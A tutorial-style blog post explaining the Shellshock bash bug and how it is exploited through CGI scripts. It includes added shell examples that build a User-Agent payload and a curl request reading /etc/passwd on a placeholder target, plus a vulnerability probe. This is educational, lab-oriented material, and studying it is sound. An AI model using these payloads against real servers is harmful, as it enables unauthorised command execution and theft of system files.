Shellshock Attack (CGI Vector)

Nave Ben Naim
6 min read · Jul 13, 2021


On 24 September 2014 the vulnerability was publicly disclosed, and every security researcher ran to patch the bash packages in their company. But with all due respect to Shellshock as a bash bug, that is not why we are gathered here: this post is about the actual attack, the CGI vector.

You can’t understand the Shellshock CGI vector without first knowing what CGI is and how it works.

What is that CGI — Common Gateway Interface?

Theoretically:

Think about a website from the early days of the web. It looked like this: http://itcorp.com/

Besides the fact that it hurts my eyes, it also does not attract visitors. What I want you to understand is that old websites were static and ugly: the content could not change unless the site’s developer edited the “.html” file by hand. That lasted until the early 1990s, when CGI came into the world. CGI lets a web page react to its users, so the site owner can add features such as showing the visitor’s name at the side of the screen, processing the user’s input, and so on.

Technically:

CGI (Common Gateway Interface) is a web standard that defines how a web server hands an HTTP request to an external program and returns that program’s output to the client. The program can be written in anything the server can execute, for example PHP, Perl or a shell script. As we said before, CGI is what lets us make a website dynamic.

Terminology: CGI is the interface; CGI scripts are the programs (written in Python, Perl, PHP, shell, etc.) that the interface runs to generate the dynamic content.

So with that terminology we can say: CGI is an interface between the web server (think of it as ‘the static web server’) and the additionally installed programs that generate dynamic web content.

How does it work?

Instead of responding only with an existing HTML file, the web server executes a program and hands it the HTTP request data: the request metadata and headers are passed as environment variables (for example QUERY_STRING, REQUEST_METHOD and HTTP_USER_AGENT), and a request body, if there is one, is passed on standard input → The script reads and processes those arguments → The script writes response headers, a blank line and the generated HTML to standard output, and the web server forwards that to the client as the HTTP response.

The following image describes that perfectly:

/cgi-bin/

All the CGI scripts we talked about are stored in that directory. Every time the server needs a script to process request data, it runs the specific executable in this directory with the data from the user’s request → The script sends its generated output back to the web server → The server forwards it to the client, still as HTML.
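To make the flow concrete, here is an added example (not from the original post): a minimal CGI script written in shell, together with a small stand-in for the web server that populates the CGI environment the way Apache would before starting a script from /cgi-bin/. The request values (method, query string, User-Agent, client address) are constructed for the demo, and the names `cgi_handler`, `run_cgi_locally` and `response_line` are chosen here.

```shell
#!/bin/sh
# Added example: a minimal CGI script plus a local stand-in for the web server.
# The server turns request metadata into environment variables: HTTP request
# headers become HTTP_<NAME> (User-Agent -> HTTP_USER_AGENT), the URL query
# becomes QUERY_STRING, and so on. The script must write header lines, then a
# blank line, then the body to stdout; the server relays that to the client.

# What a script in /cgi-bin/ (say hello.sh) would contain.
cgi_handler() {
    printf 'Content-Type: text/plain\r\n'
    printf '\r\n'                           # blank line ends the header block
    printf 'method=%s\n'     "${REQUEST_METHOD:-}"
    printf 'query=%s\n'      "${QUERY_STRING:-}"
    printf 'user_agent=%s\n' "${HTTP_USER_AGENT:-}"
    printf 'client=%s\n'     "${REMOTE_ADDR:-}"
}

# Stand-in for Apache: export the CGI variables for one constructed request,
# then run the handler in a subshell so the exports do not leak out.
run_cgi_locally() (
    export REQUEST_METHOD='GET'
    export QUERY_STRING='name=alice'
    export HTTP_USER_AGENT='Mozilla/5.0 (constructed example)'
    export REMOTE_ADDR='203.0.113.7'
    cgi_handler
)

# Line N of the response with the carriage return removed; handy for checking
# the header/body framing.
response_line() {
    run_cgi_locally | sed -n "${1}p" | tr -d '\r'
}

# Show the full CGI response exactly as the server would receive it.
run_cgi_locally
```

The point to take away is that the script never parses HTTP itself: everything it knows about the request arrives through `environ`, which is exactly the channel Shellshock abuses later in the post.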

bash — Environment Variable Intro

‘Why learn bash for Shellshock?’ is a fair question, and the name of the attack already hints at the answer. For now all I can say is that Shellshock takes advantage of a bug in the way bash handles environment variables and shell functions: specifically, the way a newly started bash imports function definitions from its environment.

Function Syntax

Well, bash, like many languages, also has functions:

func() {
    echo "FOO"
}
# In one line:
func_one() { echo "FOO"; }
func_two() { /bin/cat /etc/passwd; }

As you can see, the first function just prints the word “FOO” and returns; the second prints the system’s ‘passwd’ file.

Environment Variable

Those variables are crucial. Why? Because most of the programs your system runs depend on them. You can see why from what they hold: the shell you use, your username, your home directory, the search path for your executables, etc. (you can see the whole list by typing ‘env’ in your shell).

Setting environment variables:

# Create a shell variable within the current session:
MY_VAR="Hi There"
# Then export it, so that child processes (including child shells) can see it:
export MY_VAR
# Create a shell function:
func () { echo "Hello world"; }
# Create a shell function that does nothing (':' is the no-op command):
func () { :; }
# Export the function properly, with -f (this matters later):
export -f func

Shellshock CGI Attack — What is all about?

We already talked about CGI: it is the interface between the web server and the programs (AKA CGI scripts) that make the site dynamic. Shellshock on CGI is an exploitation of old bash versions that imported function definitions from environment variables in an unsafe way.

What do you mean, “imported function definitions in an unsafe way”?

As we said before, to pass a shell function to a child shell you type ‘export -f’, and to pass a plain shell variable you type just ‘export’. Under the hood, ‘export -f’ stores the function in the environment as a variable whose value starts with ‘() {’, and a child bash turns any environment variable that looks like that back into a function. Bash versions up to and including 4.3, before the September 2014 patches, got this wrong in two ways: any variable with such a value was treated as a function, whether or not it had really been exported with ‘export -f’, and the parser did not stop at the closing ‘}’ of the function body but kept going and executed whatever commands followed it.

# Example: an ordinary variable whose value looks like a function definition,
# followed by an extra command after the closing brace.
MY_VAR='() { :; }; echo Vulnerable' bash -c 'echo "Start a new child shell"'

We tell bash that a new command starts by typing ‘;’ after the closing brace. We start a new child shell with ‘bash -c’ because it is the child shell that scans its environment on startup: it sees ‘MY_VAR’, whose value meets the constraints it knows about what a function definition looks like, evaluates it, and unintentionally also executes the ‘echo Vulnerable’ that follows. A vulnerable bash prints ‘Vulnerable’ before ‘Start a new child shell’; a patched bash prints only the second line.
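Both the ‘export -f’ step from the previous section and the ‘MY_VAR’ experiment above can be checked on your own machine. The following is an added example, not code from the original post. Its top level is POSIX sh and it calls bash explicitly, so the bash-specific behaviour is exercised in bash whatever shell runs the file; the function names (`inherit_function`, `exported_function_variable`, `shellshock_probe`) are chosen here, and the probe string is the standard public test for the original Shellshock bug (CVE-2014-6271).

```shell
#!/bin/sh
# Added example: the legitimate export -f mechanism side by side with the
# Shellshock probe. Top level is POSIX sh; bash is invoked explicitly.

# 1. A legitimately exported function crosses into a child bash through the
#    environment: the parent serialises the definition, the child re-parses it.
inherit_function() {
    bash -c 'greet() { echo "hello from parent"; }; export -f greet; bash -c greet'
}

# 2. How a patched bash stores that exported function in the environment. The
#    variable is named BASH_FUNC_<name>%% rather than plain <name>, so an
#    ordinary variable such as HTTP_USER_AGENT can no longer be mistaken for a
#    function definition. (An unpatched bash stored it as plain greet=() {...)
exported_function_variable() {
    bash -c 'greet() { :; }; export -f greet; env' \
        | sed -n 's/^\(BASH_FUNC_greet[^=]*\)=.*/\1/p'
}

# 3. The probe from the article: an ordinary variable whose value merely looks
#    like a function definition, with a command smuggled after the closing brace.
#    A vulnerable bash runs "echo vulnerable" while importing its environment,
#    before it gets to the -c command; a patched bash ignores the variable.
shellshock_probe() {
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo this is a test' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo vulnerable ;;
        *)            echo patched ;;
    esac
}

echo "function inherited by child shell: $(inherit_function)"
echo "exported function lives in env as:  $(exported_function_variable)"
echo "local bash is:                      $(shellshock_probe)"
```

Run it on any box with bash installed; on anything patched after 2014 the last line reads ‘patched’ and the second line shows the ‘BASH_FUNC_greet%%’ naming that the fix introduced.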

CGI + Save environment variables = Shellshock

With CGI the web server passes the request data to the CGI script as environment variables, and if that script is a bash script (or shells out to bash), bash imports them on startup. For example, HTTP_USER_AGENT is set to the contents of your User-Agent header. This means that if you set your User-Agent to something like '() { :; }; echo /etc/passwd', then when that shell script runs, echo /etc/passwd is executed and its output comes back in the response (swap in '/bin/cat /etc/passwd', as in func_two above, to get the file’s contents rather than just its path).

But wait, that’s not the whole story! The injected command runs while bash is starting up, before the script’s own output, so whatever it prints becomes the first lines of the CGI response. Apache expects a CGI response to begin with header lines followed by a blank line; if the first line it sees is not a header, it rejects the response as a malformed header and the client gets an error instead of our output. So the payload must first emit either a blank line (‘echo;’) or a proper HTTP header, and only then run the command whose output we want.

EXAMPLE:

Look at the Apache error I mentioned above:

We also have the option to send an HTTP header instead of the blank line (instead of ‘echo;’):

Also note that we do not specify ‘bash -c’ here, because the web server starts the CGI script, and therefore bash, for us.
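Putting the pieces together, here is an added example (not code from the original post) that builds the CGI payload in both of the forms described above, shows the curl command that delivers it in the User-Agent header, and previews what the web server would see at the start of the response. The host `target.example`, the script path `/cgi-bin/user.sh` and the function names are placeholders chosen here; send such a request only to systems you are authorised to test.

```shell
#!/bin/sh
# Added example: building a Shellshock CGI payload whose output is a valid CGI
# response, and previewing what the server receives. Placeholders: the target
# host/path and the function names. Use only against systems you may test.

STUB='() { :; };'   # satisfies bash's "this looks like a function" check

# Payload without an explicit header: "echo;" emits the blank line that ends
# the (empty) header block, so whatever $1 prints becomes the response body.
payload_blank_line() {
    printf '%s echo; %s' "$STUB" "$1"
}

# Same, but with an explicit Content-Type header before the blank line.
payload_with_header() {
    printf '%s echo "Content-Type: text/plain"; echo; %s' "$STUB" "$1"
}

# The request that delivers it: the server exports the User-Agent header as
# HTTP_USER_AGENT, and the CGI script (a bash script) imports it on startup,
# so no "bash -c" is needed on our side.
curl_command() {
    printf "curl -A '%s' http://target.example/cgi-bin/user.sh\n" "$1"
}

# Preview: a vulnerable bash would run everything after the stub while
# importing its environment, before the script's own output. Run that part
# locally so we can see the first lines the server would receive.
preview_response() {
    injected=${1#"$STUB"}
    bash -c "$injected"
}

# Demo with a harmless command. Without the blank line the first line the
# server sees is "Vulnerable", which is not a header, so Apache rejects the
# response; the other two forms are framed correctly.
echo '--- no blank line (rejected by Apache as a malformed header) ---'
preview_response "$STUB echo Vulnerable"
echo '--- blank line first ---'
preview_response "$(payload_blank_line 'echo Vulnerable')"
echo '--- header, then blank line ---'
preview_response "$(payload_with_header 'echo Vulnerable')"
echo '--- request that delivers the real payload ---'
curl_command "$(payload_with_header '/bin/cat /etc/passwd')"
```

The preview only exercises the part after the stub; on a patched bash the stub itself is inert, which is exactly why the local probe in the previous section reports ‘patched’.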

In conclusion, I really hope that now you understand the Shellshock attack, and the CGI Shellshock attack in particular. This article was written because I solved the ‘Shocker’ machine on ‘Hack The Box’ and really wanted to know and understand what is really happening in the background of the Shellshock attack on web servers with CGI.

Also, check out my GitHub and my LinkedIn account. Thank you all! Nave. #PICKLERICK


Written by Nave Ben Naim

Cyber & Innovation fan. Specialized in PT.
